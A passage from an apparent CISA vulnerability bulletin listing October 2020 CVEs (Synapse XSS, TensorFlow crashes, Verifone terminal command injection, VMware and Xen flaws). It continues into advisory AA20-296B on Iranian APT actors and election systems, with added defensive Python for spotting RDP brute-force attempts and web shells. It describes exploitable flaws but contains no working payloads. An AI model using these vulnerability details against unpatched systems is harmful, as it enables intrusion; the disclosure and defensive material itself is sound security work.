In Sylius before versions 1.6.9, 1.7.9 and 1.8.3, the user may register in a shop with the email mail@example.com, verify it, change it to another@domain.com, and stay verified and enabled. This may lead to having accounts addressed to totally different emails than the ones that were verified. Note that this way one is not able to take over any existing account (guest or normal one). The issue has been patched in Sylius 1.6.9, 1.7.9 and 1.8.3. As a workaround, you may resolve this issue on your own by creating a custom event listener, which will listen to the sylius.customer.pre_update event. You can determine that the email has been changed if the customer email and user username are different. They are synchronized later on. Pay attention to the email-changing behavior for administrators. You may need to skip this logic for them. In order to achieve this, you should either check the master request path info to see that it does not contain the /admin prefix, or adjust the event triggered during customer update in the shop. You can find more information on how to customize the event here. 2020-10-19 not yet calculated CVE-2020-15245
MISC
CONFIRM
synapse — authrestservlet
 
AuthRestServlet in Matrix Synapse before 1.21.0 is vulnerable to XSS due to unsafe interpolation of the session GET parameter. This allows a remote attacker to execute an XSS attack on the domain Synapse is hosted on, by supplying the victim user with a malicious URL to the /_matrix/client/r0/auth/*/fallback/web or /_matrix/client/unstable/auth/*/fallback/web Synapse endpoints. 2020-10-19 not yet calculated CVE-2020-26891
MISC
MISC
CONFIRM
MISC
synk — synk
 
This affects the package scratch-svg-renderer before 0.2.0-prerelease.20201019174008. The loadString function does not escape SVG properly, which can be used to inject arbitrary elements into the DOM via the _transformMeasurements function. 2020-10-21 not yet calculated CVE-2020-7750
MISC
MISC
synk — synk
 
This affects all versions of package osm-static-maps. User input given to the package is passed directly to a template without escaping ({{{ … }}}). As such, it is possible for an attacker to inject arbitrary HTML/JS code. Depending on the context, it will be output as HTML on the page, which gives opportunity for XSS, or rendered on the server (puppeteer), which also gives opportunity for SSRF and Local File Read. 2020-10-20 not yet calculated CVE-2020-7749
MISC
MISC
MISC
tensorflow — tensorflow
 
In TensorFlow before version 2.4.0, when the `boxes` argument of `tf.image.crop_and_resize` has a very large value, the CPU kernel implementation receives it as a C++ `nan` floating point value. Attempting to operate on this is undefined behavior which later produces a segmentation fault. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved. 2020-10-21 not yet calculated CVE-2020-15266
CONFIRM
CONFIRM
CONFIRM
tensorflow — tensorflow
 
In TensorFlow before version 2.4.0, an attacker can pass an invalid `axis` value to `tf.quantization.quantize_and_dequantize`. This results in accessing a dimension outside the rank of the input tensor in the C++ kernel implementation. However, `dim_size` only does a `DCHECK` to validate the argument and then uses it to access the corresponding element of an array. Since in normal builds `DCHECK`-like macros are no-ops, this results in a segfault and out-of-bounds access of the array. The issue is patched in eccb7ec454e6617738554a255d77f08e60ee0808 and TensorFlow 2.4.0 will be released containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved. 2020-10-21 not yet calculated CVE-2020-15265
MISC
MISC
CONFIRM
tibco — multiple_products
 
The Transaction Insight reporting component of TIBCO Software Inc.’s TIBCO Foresight Archive and Retrieval System, TIBCO Foresight Archive and Retrieval System Healthcare Edition, TIBCO Foresight Operational Monitor, TIBCO Foresight Operational Monitor Healthcare Edition, TIBCO Foresight Transaction Insight, and TIBCO Foresight Transaction Insight Healthcare Edition contains a vulnerability that theoretically allows an authenticated attacker to perform SQL injection. Affected releases are TIBCO Software Inc.’s TIBCO Foresight Archive and Retrieval System: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Archive and Retrieval System Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Operational Monitor Healthcare Edition: versions 5.1.0 and below, version 5.2.0, TIBCO Foresight Transaction Insight: versions 5.1.0 and below, version 5.2.0, and TIBCO Foresight Transaction Insight Healthcare Edition: versions 5.1.0 and below, version 5.2.0. 2020-10-20 not yet calculated CVE-2020-9417
CONFIRM
tiki — tiki
 
tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. 2020-10-22 not yet calculated CVE-2020-15906
MISC
MISC
tink — tink
 
A mishandling of invalid Unicode characters in the Java implementation of Tink versions prior to 1.5 allows an attacker to change the ID part of a ciphertext, which results in the creation of a second ciphertext that can decrypt to the same plaintext. This can be a problem when encrypting with deterministic AEAD with a single key and relying on a unique ciphertext per plaintext. 2020-10-19 not yet calculated CVE-2020-8929
CONFIRM
CONFIRM
ubuntu — ubuntu
 
In containerd (an industry-standard container runtime) before version 1.2.14 there is a credential leaking vulnerability. If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (otherwise known as a “foreign layer”), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x but not 1.3.0 or later, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers. If an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account. The default containerd resolver is used by the cri-containerd plugin (which can be used by Kubernetes), the ctr development tool, and other client programs that have explicitly linked against it. This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected. If you are using containerd 1.3 or later, you are not affected. If you are using cri-containerd in the 1.2 series or prior, you should ensure you only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected. 2020-10-16 not yet calculated CVE-2020-15157
MISC
CONFIRM
UBUNTU
UBUNTU
ucms — ucms
 
An arbitrary command execution vulnerability exists in the fopen() function of file writes of UCMS v1.4.8, where an attacker can gain access to the server. 2020-10-23 not yet calculated CVE-2020-25483
MISC
ucweb — uc_browser
 
User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb’s UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb’s UC Browser version 13.0.8 and prior versions. 2020-10-20 not yet calculated CVE-2020-7364
MISC
MISC
ucweb — uc_browser
 
User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of UCWeb’s UC Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects UCWeb’s UC Browser version 13.0.8 and prior versions. 2020-10-20 not yet calculated CVE-2020-7363
MISC
MISC
ucweb — uc_browser
 
User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the RITS Browser version 3.3.9 and prior versions. 2020-10-20 not yet calculated CVE-2020-7371
MISC
MISC
velero — velero
 
Velero (prior to 1.4.3 and 1.5.2) in some instances doesn’t properly manage volume identifiers which may result in information leakage to unauthorized users. 2020-10-22 not yet calculated CVE-2020-3996
MISC
verifone — mx900_series_pinpad_payment_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have a race condition for RBAC bypass. 2020-10-23 not yet calculated CVE-2019-14711
MISC
verifone — mx900_series_pinpad_payment_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow installation of unsigned packages. 2020-10-23 not yet calculated CVE-2019-14713
MISC
verifone — mx900_series_pinpad_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 allow multiple arbitrary command injections, as demonstrated by the file manager. 2020-10-23 not yet calculated CVE-2019-14719
MISC
verifone — mx900_series_pinpad_terminals
 
Verifone MX900 series Pinpad Payment Terminals with OS 30251000 have Insecure Permissions, with resultant svc_netcontrol arbitrary command injection and privilege escalation. 2020-10-23 not yet calculated CVE-2019-14718
MISC
verifone — pinpad_payment_terminals
 
Verifone Pinpad Payment Terminals allow undocumented physical access to the system via an SBI bootloader memory write operation. 2020-10-23 not yet calculated CVE-2019-14715
MISC
verifone — verixv_pinpad_payment_terminals
 
Verifone VerixV Pinpad Payment Terminals with QT000530 allow bypass of integrity and origin control for S1G file generation. 2020-10-23 not yet calculated CVE-2019-14712
MISC
verifone — verixv_pinpad_payment_terminals
 
Verifone VerixV Pinpad Payment Terminals with QT000530 have an undocumented physical access mode (aka VerixV shell.out). 2020-10-23 not yet calculated CVE-2019-14716
MISC
verifone — verixv_pinpad_payment_terminals
 
Verifone Verix OS on VerixV Pinpad Payment Terminals with QT000530 have a Buffer Overflow via the Run system call. 2020-10-23 not yet calculated CVE-2019-14717
MISC
vm-superio — vm-superio
 
In vm-superio before 0.1.1, the serial console FIFO can grow to unlimited memory usage when data is sent to the input source (i.e., standard input). This behavior cannot be reproduced from the guest side. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host. 2020-10-16 not yet calculated CVE-2020-27173
MISC
MISC
vmware — horizon_client
 
VMware Horizon Client for Windows (5.x prior to 5.5.0) contains an information disclosure vulnerability. A malicious attacker with local privileges on the machine where Horizon Client for Windows is installed may be able to retrieve hashed credentials if the client crashes. 2020-10-23 not yet calculated CVE-2020-3998
MISC
vmware — horizon_server
 
VMware Horizon Server (7.x prior to 7.10.3 or 7.13.0) contains a Cross Site Scripting (XSS) vulnerability. Successful exploitation of this issue may allow an attacker to inject malicious script which will be executed. 2020-10-23 not yet calculated CVE-2020-3997
MISC
vmware — multiple_products
 
In VMware ESXi (6.7 before ESXi670-201908101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x before 15.1.0), Fusion (11.x before 11.1.0), the VMCI host drivers used by VMware hypervisors contain a memory leak vulnerability. A malicious actor with access to a virtual machine may be able to trigger a memory leak issue resulting in memory resource exhaustion on the hypervisor if the attack is sustained for extended periods of time. 2020-10-20 not yet calculated CVE-2020-3995
MISC
vmware — multiple_products
 
OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution. 2020-10-20 not yet calculated CVE-2020-3992
MISC
vmware — multiple_products
 
VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds write vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this vulnerability to crash the virtual machine’s vmx process or corrupt hypervisor’s memory heap. 2020-10-20 not yet calculated CVE-2020-3982
MISC
vmware — multiple_products
 
VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202008101-SG, 6.5 before ESXi650-202007101-SG), Workstation (15.x), Fusion (11.x before 11.5.6) contain an out-of-bounds read vulnerability due to a time-of-check time-of-use issue in ACPI device. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process. 2020-10-20 not yet calculated CVE-2020-3981
MISC
vmware — nsx-t
 
VMware NSX-T (3.x before 3.0.2, 2.5.x before 2.5.2.2.0) contains a security vulnerability that exists in the way it allows a KVM host to download and install packages from NSX manager. A malicious actor with MITM positioning may be able to exploit this issue to compromise the transport node. 2020-10-20 not yet calculated CVE-2020-3993
MISC
vmware — vcenter_server
 
VMware vCenter Server (6.7 before 6.7u3, 6.6 before 6.5u3k) contains a session hijack vulnerability in the vCenter Server Appliance Management Interface update function due to a lack of certificate validation. A malicious actor with network positioning between vCenter Server and an update repository may be able to perform a session hijack when the vCenter Server Appliance Management Interface is used to download vCenter updates. 2020-10-20 not yet calculated CVE-2020-3994
MISC
webpack-subsource-integrity — webpack-subsource-integrity
 
In webpack-subresource-integrity before version 1.5.1, all dynamically loaded chunks receive an invalid integrity hash that is ignored by the browser, and therefore the browser cannot validate their integrity. This removes the additional level of protection offered by SRI for such chunks. Top-level chunks are unaffected. This issue is patched in version 1.5.1. 2020-10-19 not yet calculated CVE-2020-15262
MISC
MISC
CONFIRM
wire — wire
 
In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victim’s machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL’s protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory. 2020-10-16 not yet calculated CVE-2020-15258
MISC
MISC
CONFIRM
wso2 — api_manager
 
WSO2 API Manager 3.1.0 and earlier has reflected XSS on the “publisher” component’s admin interface. More precisely, it is possible to inject an XSS payload into the owner POST parameter, which does not filter user inputs. By putting an XSS payload in place of a valid Owner Name, a modal box appears that writes an error message concatenated to the injected payload (without any form of data encoding). This can also be exploited via CSRF. 2020-10-21 not yet calculated CVE-2020-17454
CONFIRM
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 guest OS users to cause a host OS denial of service, achieve data corruption, or possibly gain privileges by exploiting a race condition that leads to a use-after-free involving 2MiB and 1GiB superpages. 2020-10-22 not yet calculated CVE-2020-27672
MISC
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 HVM and PVH guest OS users to cause a denial of service (data corruption), cause a data leak, or possibly gain privileges because coalescing of per-page IOMMU TLB flushes is mishandled. 2020-10-22 not yet calculated CVE-2020-27671
MISC
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 guest OS users to cause a denial of service (data corruption), cause a data leak, or possibly gain privileges because an AMD IOMMU page-table entry can be half-updated. 2020-10-22 not yet calculated CVE-2020-27670
MISC
xen — xen
 
An issue was discovered in Xen through 4.14.x allowing x86 PV guest OS users to gain guest OS privileges by modifying kernel memory contents, because invalidation of TLB entries is mishandled during use of an INVLPG-like attack technique. 2020-10-22 not yet calculated CVE-2020-27674
MISC
xwiki — xwiki
 
In XWiki before version 12.5 and 11.10.6, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context, which contains tools that allow instantiating arbitrary Java objects and invoking methods that may lead to arbitrary code execution. This is patched in XWiki 12.5 and XWiki 11.10.6. 2020-10-16 not yet calculated CVE-2020-15252
CONFIRM
MISC
MISC
yubico — yubihsm-shell
 
An issue was discovered in the _send_secure_msg() function of yubihsm-shell through 2.0.2. The function does not validate the embedded length field of a message received from the device. This could lead to an oversized memcpy() call that will crash the running process. This could be used by an attacker to cause a denial of service. 2020-10-19 not yet calculated CVE-2020-24388
MISC
MISC
MISC
MISC
yubico — yubihsm-shell
 
An issue was discovered in the yh_create_session() function of yubihsm-shell through 2.0.2. The function does not explicitly check the returned session id from the device. An invalid session id would lead to out-of-bounds read and write operations in the session array. This could be used by an attacker to cause a denial of service attack. 2020-10-19 not yet calculated CVE-2020-24387
MISC
MISC
MISC
MISC

This product is provided subject to this Notification and this Privacy & Use policy.

AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems

Original release date: October 22, 2020<br/><h3>Summary</h3><p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing and interfering with the U.S. elections to sow discord among voters and undermine public confidence in the U.S. electoral process.</p>

<p>The APT actors are creating fictitious media sites and spoofing legitimate media sites to spread obtained U.S. voter-registration data, anti-American propaganda, and misinformation about voter suppression, voter fraud, and ballot fraud.</p>

<p>The APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.</p>

<p>Click here for a <a href="https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296B_Iranian_APT_Actors_Threaten_Election-Related_Systems.pdf">PDF</a> version of this report.</p>
<h3>Technical Details</h3><p class="MsoNormal">These actors have conducted a significant number of intrusions against U.S.-based networks since August 2019. The actors leveraged several Common Vulnerabilities and Exposures (CVEs)—notably <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9248">CVE-2017-9248</a>—pertaining to virtual private networks (VPNs) and content management systems (CMSs).</p>

<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a> affects F5 VPNs. Remote attackers could exploit this vulnerability to execute arbitrary code.[<a href="https://support.f5.com/csp/article/K52145254">1</a>]</li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9248">CVE-2017-9248</a> affects Telerik UI. Attackers could exploit this vulnerability in web applications using Telerik UI for ASP.NET AJAX to conduct cross-site scripting (XSS) attacks.[<a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">2</a>]</li>
</ul>

<p>Historically, these actors have conducted DDoS attacks, SQL injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns. These activities could render these systems temporarily inaccessible to the public or election officials, which could slow, but would not prevent, voting or the reporting of results.</p>

<ul>
<li><strong>A DDoS attack </strong>could slow or render election-related public-facing websites inaccessible by flooding the internet-accessible server with requests; this would prevent users from accessing online resources, such as voting information or non-official voting results. In the past, cyber actors have falsely claimed DDoS attacks have compromised the integrity of voting systems in an effort to mislead the public that their attack would prevent a voter from casting a ballot or change votes already cast.</li>
<li><strong>A SQL injection</strong> involves a threat actor inserting malicious code into the entry field of an application, causing that code to execute if entries have not been sanitized. SQL injections are among the most dangerous and common exploits affecting websites. A SQL injection into a media company’s CMS could enable a cyber actor access to network systems to manipulate content or falsify news reports prior to publication.</li>
<li><strong>Spear-phishing messages</strong> may not be easily detectable. These emails often ask victims to fill out forms or verify information through links embedded in the email. APT actors use spear phishing to gain access to information—often credentials, such as passwords—and to identify follow-on victims. A malicious cyber actor could use compromised email access to spread disinformation to the victims’ contacts or collect information sent to or from the compromised account.</li>
<li><strong>Public-facing website defacements</strong> typically involve a cyber threat actor compromising the website or its associated CMS, allowing the actor to upload images to the site’s landing page. In situations where such public-facing websites relate to elections (e.g., the website of a county board of elections), defacements could cast doubt on the security and legitimacy of the websites’ information. If cyber actors were able to successfully change an election-related website, the underlying data and internal systems would remain uncompromised.</li>
<li><strong>Disinformation campaigns </strong>involve malign actions taken by foreign governments or actors designed to sow discord, manipulate public discourse, or discredit the electoral system. Malicious actors often use social media as well as fictitious and spoofed media sites for these campaigns. Based on their corporate policies, social media companies have worked to counter these actors’ use of their platforms to promote fictitious news stories by removing the news stories, and in many instances, closing the accounts related to the malicious activity. However, these adversaries will continue their attempts to create fictitious accounts that promote divisive storylines to sow discord, even after the election.</li>
</ul>
<h3>Mitigations</h3><p>The following recommended mitigations list includes self-protection strategies against the cyber techniques used by the APT actors:</p>

<ul>
<li>Validate input—input validation is a method of sanitizing untrusted input provided by web application users. Implementing input validation can protect against security flaws of web applications by significantly reducing the probability of successful exploitation. Types of attacks possibly prevented include SQL injection, XSS, and command injection.</li>
<li>Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.</li>
<li>Verify that all cloud-based virtual machine instances with a public IP do not have open RDP ports, unless there is a valid business reason to do so. Place any system with an open RDP port behind a firewall, and require users to use a VPN to access it through the firewall.</li>
<li>Enable strong password requirements and account lockout policies to defend against brute-force attacks.</li>
<li>Apply multi-factor authentication, when possible.</li>
<li>Apply system and software updates regularly, particularly if you are deploying products affected by CVE-2020-5902 and CVE-2017-9248.
<ul>
<li>For patch information on CVE-2020-5902, refer to F5 Security Advisory <a href="https://support.f5.com/csp/article/K52145254">K52145254</a>.</li>
<li>For patch information on CVE-2017-9248, refer to <a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">Progress Telerik details for CVE-2017-9248</a>.</li>
</ul>
</li>
<li>Maintain a good information back-up strategy that involves routinely backing up all critical data and system configuration information on a separate device. Store the backups offline; verify their integrity and restoration process.</li>
<li>Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days, and review them regularly to detect intrusion attempts.</li>
<li>When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.</li>
<li>Ensure third parties that require RDP access are required to follow internal policies on remote access.</li>
<li>Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.</li>
<li>Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs, recognizing VPNs are only as secure as the connected devices.</li>
<li>Be aware of unsolicited contact on social media from any individual you do not know.</li>
<li>Be aware of attempts to pass links or files via social media from anyone you do not know.</li>
<li>Be aware of unsolicited requests to share a file via online services.</li>
<li>Be aware of email messages conveying suspicious alerts or other online accounts, including login notifications from foreign countries or other alerts indicating attempted unauthorized access to your accounts.</li>
<li>Be suspicious of emails purporting to be from legitimate online services (e.g., the images in the email appear to be slightly pixelated and/or grainy, language in the email seems off, the email originates from an IP address not attributable to the provider/company).</li>
<li>Be suspicious of unsolicited email messages that contain shortened links (e.g., via <code>tinyurl</code>, <code>bit.ly</code>).</li>
<li>Use security features provided by social media platforms, use <a href="https://us-cert.cisa.gov/ncas/current-activity/2018/03/27/Creating-and-Managing-Strong-Passwords">strong passwords</a>, change passwords frequently, and use a different password for each social media account.</li>
<li>See CISA’s <a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">Tip on Best Practices for Securing Election Systems</a> for more information.</li>
</ul>
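<p>One way to carry out the log review recommended in the list above (capture RDP logins, then review them for intrusion attempts), shown as an added example that is not part of the CISA/FBI advisory. The CSV layout, account names, addresses, and the threshold and window values are constructed assumptions; event IDs 4624/4625 and logon types 3 and 10 are the standard Windows Security log values.</p>

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export of Windows Security events (column layout is an assumption).
# Addresses come from the RFC 5737 documentation ranges; account names are made up.
SAMPLE_LOG = """\
timestamp,event_id,logon_type,account,source_ip
2020-10-20T01:00:00,4625,10,guest,192.0.2.10
2020-10-20T02:14:01,4625,10,administrator,203.0.113.45
2020-10-20T02:14:09,4625,10,administrator,203.0.113.45
2020-10-20T02:14:17,4625,10,admin,203.0.113.45
2020-10-20T02:14:26,4625,3,svc_backup,203.0.113.45
2020-10-20T02:14:33,4625,3,svc_backup,203.0.113.45
2020-10-20T02:14:41,4625,3,svc_backup,203.0.113.45
2020-10-20T02:15:02,4624,10,svc_backup,203.0.113.45
2020-10-20T05:00:00,4625,10,guest,192.0.2.10
2020-10-20T08:30:12,4625,10,jsmith,198.51.100.7
2020-10-20T08:30:40,4624,10,jsmith,198.51.100.7
2020-10-20T09:00:00,4625,2,jsmith,-
2020-10-20T09:05:00,4625,10,guest,192.0.2.10
2020-10-20T13:00:00,4625,10,guest,192.0.2.10
2020-10-20T17:00:00,4625,10,guest,192.0.2.10
"""

FAILED_LOGON = "4625"      # "An account failed to log on"
SUCCESSFUL_LOGON = "4624"  # "An account was successfully logged on"
# 10 = RemoteInteractive (RDP session); 3 = Network, which is where RDP
# failures are recorded when Network Level Authentication is enabled.
REMOTE_LOGON_TYPES = {"3", "10"}


def parse_events(text):
    """Parse the CSV export and keep only remote logon events, oldest first."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        if row["logon_type"] not in REMOTE_LOGON_TYPES:
            continue  # console and service logons are out of scope here
        events.append({
            "time": datetime.fromisoformat(row["timestamp"]),
            "event_id": row["event_id"],
            "account": row["account"],
            "source_ip": row["source_ip"],
        })
    events.sort(key=lambda event: event["time"])
    return events


def find_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Flag sources with >= threshold failed remote logons inside the window.

    For each flagged source, also list accounts that logged on successfully
    from it after the burst: those need a password reset and host triage.
    """
    by_ip = defaultdict(list)
    for event in events:
        by_ip[event["source_ip"]].append(event)

    findings = []
    for ip, ip_events in by_ip.items():
        failures = [e for e in ip_events if e["event_id"] == FAILED_LOGON]
        times = [e["time"] for e in failures]
        burst_end = None
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until the span fits.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = times[end]
                break
        if burst_end is None:
            continue
        successes = sorted({
            e["account"] for e in ip_events
            if e["event_id"] == SUCCESSFUL_LOGON and e["time"] >= burst_end
        })
        findings.append({
            "source_ip": ip,
            "failed_logons": len(failures),
            "accounts_tried": sorted({e["account"] for e in failures}),
            "success_after_burst": successes,
        })
    return sorted(findings, key=lambda finding: finding["source_ip"])


if __name__ == "__main__":
    for finding in find_bruteforce(parse_events(SAMPLE_LOG)):
        print(finding)
```

<p>A single mistyped password followed by a success (198.51.100.7 in the sample) and failures spread over many hours (192.0.2.10) stay below the threshold; tune both parameters to the account lockout policy in force.</p>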

<h4>General Mitigations</h4>

<h5>Keep applications and systems updated and patched</h5>

<p>Apply all available software updates and patches; automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed at which threat actors create exploits after a patch is released. These “N-day” exploits can be as damaging as zero-day exploits. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to ensure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.[<a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1">3</a>] In addition to updating the application, use tools (e.g., the OWASP Dependency-Check Project tool[<a href="https://owasp.org/www-project-dependency-check/">4</a>]) to identify publicly known vulnerabilities in third-party libraries that the application depends on.</p>

<h5>Scan web applications for SQL injection and other common web vulnerabilities</h5>

<p>Implement a plan to scan public-facing web servers for common web vulnerabilities (SQL injection, cross-site scripting, etc.); use a commercial web application vulnerability scanner in combination with a source code scanner.[<a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm">5</a>] As vulnerabilities are found, they should be fixed or patched. This is especially crucial for networks that host older web applications; as sites get older, more vulnerabilities are discovered and exposed.</p>

<h5>Deploy a web application firewall</h5>

<p>Deploy a web application firewall (WAF) to help prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools.</p>

<h5>Deploy techniques to protect against web shells</h5>

<p>Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware.[<a href="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF">6</a>] Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.</p>
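<p>Because web shells are created by adding or modifying a file in an existing web application, comparing the web root against a known-good manifest surfaces them. The following is an added example, not part of the advisory; the extension list, function names, and the files created by <code>demo()</code> are constructed assumptions, and in practice the baseline is built from a trusted deployment and stored off the server.</p>

```python
import hashlib
import tempfile
from pathlib import Path

# Extensions the web server may execute; changes to these are reviewed first.
# The list is an assumption and should mirror the server's configured handlers.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".jspx", ".cfm"}


def hash_file(path, chunk_size=65536):
    """Return the SHA-256 hex digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(web_root):
    """Map every file under web_root (relative POSIX path) to its SHA-256."""
    root = Path(web_root)
    return {
        path.relative_to(root).as_posix(): hash_file(path)
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }


def compare_to_baseline(web_root, baseline):
    """Diff the live web root against a known-good manifest.

    'priority' lists added or modified files with an executable extension,
    which is where a web shell has to live in order to run.
    """
    current = build_manifest(web_root)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(
        path for path in current
        if path in baseline and current[path] != baseline[path]
    )
    priority = sorted(
        path for path in added + modified
        if Path(path).suffix.lower() in SCRIPT_EXTENSIONS
    )
    return {"added": added, "modified": modified, "removed": removed, "priority": priority}


def demo():
    """Build a constructed web root, change it, and return the comparison report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "css").mkdir()
        (root / "uploads").mkdir()
        (root / "index.php").write_text("<?php echo 'home'; ?>\n")
        (root / "contact.php").write_text("<?php echo 'contact'; ?>\n")
        (root / "css" / "site.css").write_text("body { margin: 0; }\n")
        baseline = build_manifest(root)  # taken while the site is known good

        # Constructed changes made after the baseline was recorded.
        (root / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff constructed image bytes")
        (root / "uploads" / "image.php").write_text("<?php /* constructed placeholder */ ?>\n")
        (root / "index.php").write_text("<?php echo 'home'; /* constructed edit */ ?>\n")
        (root / "contact.php").unlink()
        return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    report = demo()
    for category in ("priority", "added", "modified", "removed"):
        print(category, report[category])
```

<p>A script file appearing under an upload directory, as in the constructed report, is the first item to triage; expected changes from a release are cleared by rebuilding the baseline from that release.</p>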

<h5>Use multi-factor authentication for administrator accounts</h5>

